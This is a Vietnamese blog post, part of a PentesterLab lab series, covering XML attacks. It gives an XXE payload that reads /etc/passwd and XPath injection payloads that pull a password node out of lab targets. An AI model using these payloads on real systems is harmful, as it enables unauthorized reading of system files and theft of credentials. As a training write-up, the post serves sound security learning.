By using this site, you agree to the Privacy Policy and Terms of Use.
Accept
FantasistaFantasista
  • Home
  • Network
  • System
  • Software
  • Security
    SecurityShow More
    Hướng dẫn chung về Kali Linux
    27/05/2022
    Ransomware tấn công có chủ đích vào các tổ chức
    03/11/2021
    Series Pentesterlab – Day 22: CVE-2007-1860: mod_jk double-decoding
    04/10/2021
    Series Pentesterlab – Day 21: From SQL Injection to Shell
    15/09/2021
    Series Tryhackme – Day 01: Starting Out In Cyber Sec
    13/09/2021
  • Coding
  • Life
Search
© 2022 Foxiz News Network. Ruby Design Company. All Rights Reserved.
Reading: Series Pentesterlab – Day 16: XML Attacks
Share
Sign In
Notification Show More
Latest News
Hướng dẫn chung về Kali Linux
27/05/2022
Ransomware tấn công có chủ đích vào các tổ chức
03/11/2021
Hướng dẫn kích hoạt IDM Full không cần crack, sử dụng key an toàn
10/10/2021
Series Pentesterlab – Day 22: CVE-2007-1860: mod_jk double-decoding
04/10/2021
Series Pentesterlab – Day 21: From SQL Injection to Shell
15/09/2021
Aa
FantasistaFantasista
Aa
Search
Have an existing account? Sign In
Follow US
© 2022 Foxiz News Network. Ruby Design Company. All Rights Reserved.
Fantasista > Blog > Fantasista > Bảo mật > Pentest > Series Pentesterlab – Day 16: XML Attacks
Bảo mậtPentest

Series Pentesterlab – Day 16: XML Attacks

Fantasista
Fantasista 04/09/2021
Updated 2021/09/04 at 11:03 Chiều
Share
4 Min Read
SHARE
Mục lục
XML Attacks 01XML Attacks 02

Một số XML parser sẽ giải quyết các thực thể bên ngoài và sẽ cho phép người dùng kiểm soát thông điệp XML truy cập tài nguyên; ví dụ để đọc một tệp trên hệ thống. Thực thể sau có thể được khai báo, ví dụ:

1
<!ENTITY x SYSTEM "file:///etc/passwd">

Bạn sẽ cần phải bao thư này đúng cách, để làm cho nó hoạt động chính xác:

1
2
<!DOCTYPE test [
    <!ENTITY x SYSTEM "file:///etc/passwd">]>

Sau đó, bạn có thể chỉ cần sử dụng tham chiếu đến x: &x; (đừng quên mã hóa &) để lấy kết quả tương ứng được chèn vào tài liệu XML trong quá trình phân tích cú pháp của nó (phía máy chủ).

XML Attacks 01

Cách giải bài tập này:

https://ptl-339ca851-bd93960d.libcurl.st/?xml=<!DOCTYPE test [ <!ENTITY x SYSTEM “file:///etc/passwd”>]>test>%26x;</test>

XML Attacks 02

Trong ví dụ này, mã sử dụng input từ người dùng, bên trong biểu thức XPath. XPath là một ngôn ngữ truy vấn, nó chọn các nút từ một tài liệu XML. Hãy tưởng tượng tài liệu XML như một cơ sở dữ liệu và XPath như một truy vấn SQL. Nếu bạn có thể thao tác với truy vấn, bạn sẽ có thể truy xuất các phần tử mà bạn thường không có quyền truy cập.

Nếu chúng tôi đưa ra single quote, chúng tôi có thể thấy lỗi sau:

1
2
3
Warning: SimpleXMLElement::xpath(): Invalid predicate in /var/www/index.php on line 22
Warning: SimpleXMLElement::xpath(): xmlXPathEval: evaluation failed in /var/www/index.php on line 22
Warning: Variable passed to each() is not an array or object in /var/www/index.php on line 23

Cũng giống như SQL injection, XPath cho phép bạn thực hiện logic boolean và bạn có thể thử:

  • ‘ and ‘1’=’1 and you should get the same result.
  • ‘ or ‘1’=’0 and you should get the same result.
  • ‘ and ‘1’=’0 and you should not get any result.
  • ‘ or ‘1’=’1 and you should get all results.

Dựa trên những bài kiểm tra này và kiến ​​thức trước đây về XPath, có thể biết được biểu thức XPath trông như thế nào:

1
[PARENT NODES]/name[.='[INPUT]']/[CHILD NODES]

Để comment phần còn lại của biểu thức XPath, bạn có thể sử dụng NULL BYTE (bạn sẽ cần mã hóa thành %00). Như chúng ta có thể thấy trong biểu thức XPath ở trên, chúng ta cũng cần thêm dấu ] để hoàn thành đúng cú pháp. Payload của chúng tôi bây giờ trông giống như hacker']%00  (hoặc hacker' or 1=1]%00  nếu chúng tôi muốn có tất cả kết quả).

Nếu chúng ta cố gắng tìm nút con của nút hiện tại, sử dụng '%20or%201=1]/child::node()%00 , chúng ta không nhận được nhiều thông tin.

Ở đây, vấn đề là chúng ta cần sao lưu trong hệ thống phân cấp nút, để có thêm thông tin. Trong XPath, điều này có thể được thực hiện bằng cách sử dụng cha :: * như một phần của payload. Bây giờ chúng ta có thể chọn nút cha của nút hiện tại và hiển thị tất cả nút con bằng cách sử dụng hacker'%20or%201=1]/parent::*/child::node()%00 .

Một trong những giá trị của nút trông giống như một mật khẩu. Chúng tôi có thể xác nhận điều này, bằng cách kiểm tra xem tên của nút có phải là mật khẩu hay không bằng cách sử dụng payload hacker']/parent::*/password%00 .

http://ptl-55e50692-b60c4657.libcurl.st/?name=hacker&password=pentesterlab

You Might Also Like

Hướng dẫn chung về Kali Linux

Ransomware tấn công có chủ đích vào các tổ chức

Series Pentesterlab – Day 22: CVE-2007-1860: mod_jk double-decoding

Series Pentesterlab – Day 21: From SQL Injection to Shell

Series Tryhackme – Day 01: Starting Out In Cyber Sec

TAGGED: pentest, pentesterlab

Sign Up For Daily Newsletter

Be keep up! Get the latest breaking news delivered straight to your inbox.
By signing up, you agree to our Terms of Use and acknowledge the data practices in our Privacy Policy. You may unsubscribe at any time.
Fantasista 04/09/2021
Share this Article
Facebook TwitterEmail Copy Link Print
Share
Posted by Fantasista
Follow:
Xin chào, mình là Tân. Mình tạo blog này 01/06/2021. Đây là nơi mình ghi chép lại những suy nghĩ, cảm nhận trong cuộc sống và những kiến thức mà mình học được.
Previous Article Series Pentesterlab – Day 15: File Upload
Next Article Series Pentesterlab – Day 17: XSS
Leave a comment Leave a comment

Trả lời Hủy

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *

Stay Connected

235.3k Followers Like
69.1k Followers Follow
11.6k Followers Pin
56.4k Followers Follow
136k Subscribers Subscribe
4.4k Followers Follow
- Advertisement -
Ad imageAd image

Latest News

Hướng dẫn chung về Kali Linux
Bảo mật Công cụ bảo mật 27/05/2022
Ransomware tấn công có chủ đích vào các tổ chức
An toàn thông tin Bảo mật 03/11/2021
Hướng dẫn kích hoạt IDM Full không cần crack, sử dụng key an toàn
Phần mềm Tiện ích 10/10/2021
Series Pentesterlab – Day 22: CVE-2007-1860: mod_jk double-decoding
Bảo mật Pentest 04/10/2021
https://pbs.twimg.com/profile_images/1542611508093661184/MR5LYGqH_normal.jpg
@envato
1.5k Following
71k Followers
https://pbs.twimg.com/profile_images/1542611508093661184/MR5LYGqH_normal.jpg 24 phút ago
@reputeinfosys Hi there, can you provide us with the ticket number to your request and we will make sure someone ge… https://t.co/TPdKynvll8
https://pbs.twimg.com/profile_images/1542611508093661184/MR5LYGqH_normal.jpg 37 phút ago
@joeyancey_ Hi there, we would be more than willing to review this case for you. Please submit a support ticket her… https://t.co/V7jXIg1G3q
https://pbs.twimg.com/profile_images/1542611508093661184/MR5LYGqH_normal.jpg 9 giờ ago
@barts_ron Hi! Thanks for contacting us. It looks like all our systems are running smoothly. You can check the stat… https://t.co/Haz9yXFnMM

You Might also Like

Hướng dẫn chung về Kali Linux

27/05/2022
An toàn thông tinBảo mật

Ransomware tấn công có chủ đích vào các tổ chức

03/11/2021
Bảo mậtPentest

Series Pentesterlab – Day 22: CVE-2007-1860: mod_jk double-decoding

04/10/2021
Bảo mậtPentest

Series Pentesterlab – Day 21: From SQL Injection to Shell

15/09/2021
//

We influence 20 million users and is the number one business and technology news network on the planet

Quick Link

  • About
  • Contact
  • FAQs

Top Categories

  • Home
  • Network
  • System
  • Software
  • Security
  • Coding
  • Life
FantasistaFantasista
Follow US

© 2022 Foxiz News Network. Ruby Design Company. All Rights Reserved.

Join Us!

Subscribe to our newsletter and never miss our latest news, podcasts etc..

Zero spam, Unsubscribe at any time.

Removed from reading list

Undo
Welcome Back!

Sign in to your account

Register Lost your password?